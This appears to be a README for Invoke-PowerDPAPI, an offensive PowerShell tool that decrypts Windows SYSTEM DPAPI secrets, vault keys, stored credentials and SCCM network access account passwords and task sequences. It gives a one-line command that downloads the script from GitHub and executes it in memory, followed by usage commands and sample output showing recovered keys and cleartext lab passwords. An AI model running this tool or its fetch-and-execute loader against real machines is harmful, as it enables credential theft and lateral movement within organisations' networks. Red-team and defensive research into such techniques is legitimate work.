Invoke-PowerDPAPI is a PowerShell port of some SharpDPAPI and SharpSCCM functionality.
For the moment this is limited to SYSTEM level functions such as triaging SYSTEM master keys and decrpypting the following secrets:
- System Vaults
- System Credentials
- SCCM NAA accounts (WMI / Disk)
- SCCM Task Sequences (WMI / Disk)
Not all SharpDPAPI functionality will be implemented into this port. This will be limited to functionality that fits my workflow and code that I believe can be reused in further projects.
Future updates to be completed:
- User level DPAPI
- Automate takeover of each user logon session and decrypt each user DPAPI secret
- SYSTEM Certificates
- Domain Backup key support
❗ Invoke-PowerDPAPI must be executed in a high integrity process
IRM "https://raw.githubusercontent.com/The-Viper-One/Invoke-PowerDPAPI/refs/heads/main/Invoke-PowerDPAPI.ps1" | IEXRuns MachineVaults, MachineCredentials, SCCM_Disk and SCCM_WMI
Invoke-PowerDPAPI MachineTriage
Invoke-PowerDPAPI MachineVaults[*] Triaging SYSTEM Vaults
[*] Triaging Vault Folder: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Vault\4BF4C442-9B8A-41A0-B380-DD4A704DDB28
VaultID : 4bf4c442-9b8a-41a0-b380-dd4a704ddb28
Name : Web Credentials
guidMasterKey : {e922342f-143e-4b65-a25b-e83354a47007}
size : 324
flags : 0x20000000 (CRYPTPROTECT_SYSTEM)
algHash/algCrypt : 32782 (CALG_SHA_512) / 26128 (CALG_AES_256)
description :
guidMasterKey :
size : 324
flags : 0x20000000 (CRYPTPROTECT_SYSTEM)
algHash/algCrypt : 32782 (CALG_SHA_512) / 26128 (CALG_AES_256)
description : Vault Policy Key
aes128 key : 17D5264E849A7136427830A4835B8669
aes256 key : 428397F3F8260174A5923BC66CC014CB2D3C4ABAFB5FFBC90D7A959DC4DC817C
Invoke-PowerDPAPI MachineCredentials[*] Triaging System Credentials
Folder : C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials
CredFile : 3F38B7EDDCC210906994CAC4A9077348
guidMasterKey : {8173b631-3636-4c96-81e7-ae2c8fd60632}
size : 544
flags : 0x20000000 (CRYPTPROTECT_SYSTEM)
algHash/algCrypt : 32782 (CALG_SHA_512) / 26128 (CALG_AES_256)
description : Local Credential Data
guidMasterKey :
size : 264
flags : 0x00000030 (CRYPTPROTECT_SYSTEM)
algHash/algCrypt : 32782 (CALG_SHA_512) / 26128 (CALG_AES_256)
description : Local Credential Data
LastWritten : 6/19/2025 12:18:59 AM
TargetName : Domain:batch=TaskScheduler:Task:{52340B14-C919-4223-970B-103AAAFE2720}
TargetAlias :
Comment :
UserName : ludus\domainuser
Credential : password
Runs SCCM_WMI and SCCM_Disk
Invoke-PowerDPAPI SCCM
Invoke-PowerDPAPI SCCM_WMI
Invoke-PowerDPAPI SCCM_WMI -SaveTS # Saves Task Sequences in XML format to PWD[+] Found 1 Network Access Account(s)
[+] Decrypting network access account credentials
guidMasterKey : {8173b631-3636-4c96-81e7-ae2c8fd60632}
size : 266
flags : 0x00000000
algHash/algCrypt : 32782 (CALG_SHA_512) / 26128 (CALG_AES_256)
description :
guidMasterKey : {8173b631-3636-4c96-81e7-ae2c8fd60632}
size : 250
flags : 0x00000000
algHash/algCrypt : 32782 (CALG_SHA_512) / 26128 (CALG_AES_256)
description :
Network Access Username: ludus\sccm_naa_2
Network Access Password: password123
[+] Found 2 Task Sequence(s)
[+] Decrypting Task Sequences
guidMasterKey : {8173b631-3636-4c96-81e7-ae2c8fd60632}
size : 8042
flags : 0x00000000
algHash/algCrypt : 32782 (CALG_SHA_512) / 26128 (CALG_AES_256)
description :
[+] Task Sequence:
<sequence version="3.10">
<step type="SMS_TaskSequence_RunCommandLineAction" name="Run SQL CMD" description="" runIn="WinPEandFullOS" successCodeList="0 3010" retryCount="0" runFromNet="false">
<action>smsswd.exe /run: sqlcmd -S myserver.database.windows.net -d MyDatabase -U MyUserName -P MySecretPassword -Q "SELECT TOP 10 * FROM dbo.MyTable"</action>
<defaultVarList>
<variable name="CommandLine" property="CommandLine" hidden="true">sqlcmd -S myserver.database.windows.net -d MyDatabase -U MyUserName -P MySecretPassword -Q "SELECT TOP 10 * FROM dbo.MyTable"</variable>
<variable name="SMSTSDisableWow64Redirection" property="DisableWow64Redirection">false</variable>
<variable name="SMSTSRunCommandLineOutputVariableName" property="OutputVariableName">
</variable>
<variable name="_SMSTSRunCommandLineAsUser" property="RunAsUser">false</variable>
<variable name="SuccessCodes" property="SuccessCodes" hidden="true">0 3010</variable>
</defaultVarList>
</step>
</sequence>
Invoke-PowerDPAPI SCCM_Disk
Invoke-PowerDPAPI SCCM_Disk -SaveTS # Saves Task Sequences in XML format to PWD[+] Decrypting 1 network access account secrets
guidMasterKey : {8173b631-3636-4c96-81e7-ae2c8fd60632}
size : 266
flags : 0x00000000
algHash/algCrypt : 32782 (CALG_SHA_512) / 26128 (CALG_AES_256)
description :
guidMasterKey : {8173b631-3636-4c96-81e7-ae2c8fd60632}
size : 250
flags : 0x00000000
algHash/algCrypt : 32782 (CALG_SHA_512) / 26128 (CALG_AES_256)
description :
NetworkAccessUsername: ludus\sccm_naa_2
NetworkAccessPassword: password123
[+] Decrypting 1 task sequence secrets
guidMasterKey : {8173b631-3636-4c96-81e7-ae2c8fd60632}
size : 2154
flags : 0x00000000
algHash/algCrypt : 32782 (CALG_SHA_512) / 26128 (CALG_AES_256)
description :
<sequence version="3.10">
<step type="SMS_TaskSequence_RunCommandLineAction" name="Run SQL CMD" description="" runIn="WinPEandFullOS" successCodeList="0 3010" retryCount="0" runFromNet="false">
<action>smsswd.exe /run: sqlcmd -S myserver.database.windows.net -d MyDatabase -U MyUserName -P MySecretPassword -Q "SELECT TOP 10 * FROM dbo.MyTable"</action>
<defaultVarList>
<variable name="CommandLine" property="CommandLine" hidden="true">sqlcmd -S myserver.database.windows.net -d MyDatabase -U MyUserName -P MySecretPassword -Q "SELECT TOP 10 * FROM dbo.MyTable"</variable>
<variable name="SMSTSDisableWow64Redirection" property="DisableWow64Redirection">false</variable>
<variable name="SMSTSRunCommandLineOutputVariableName" property="OutputVariableName">
</variable>
<variable name="_SMSTSRunCommandLineAsUser" property="RunAsUser">false</variable>
<variable name="SuccessCodes" property="SuccessCodes" hidden="true">0 3010</variable>
</defaultVarList>
</step>
</sequence>